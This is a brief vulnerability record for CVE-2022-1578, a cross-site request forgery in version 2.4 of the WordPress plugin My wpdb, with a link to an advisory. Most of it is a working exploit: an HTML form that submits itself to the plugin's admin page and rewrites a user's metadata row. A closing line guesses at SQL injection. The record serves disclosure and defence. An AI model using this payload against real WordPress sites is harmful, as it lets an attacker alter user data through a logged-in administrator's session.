CVE: CVE-2022-1578

Name: My wpdb (my-wpdb)

Version: 2.4

Date: 2022-04-09 18:54:34

Advisory: https://wpscan.com/vulnerability/c280da92-4ac2-43ea-93a2-6c583b79b98b

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/?page=mywpdb_page&table=uX49H_usermeta&where%5Bumeta_id%5D=1" method="POST">
    <input type="text" name="umeta_id" value="1">
    <input type="text" name="user_id" value="1">
    <input type="text" name="meta_key" value="nickname">
    <input type="text" name="meta_value" value="test1111111">
    <input type="text" name="mywpdbUpdateTrigger" value="">
</form>
<script>
    document.forms[0].submit();
</script>

Probably also SQL Injections.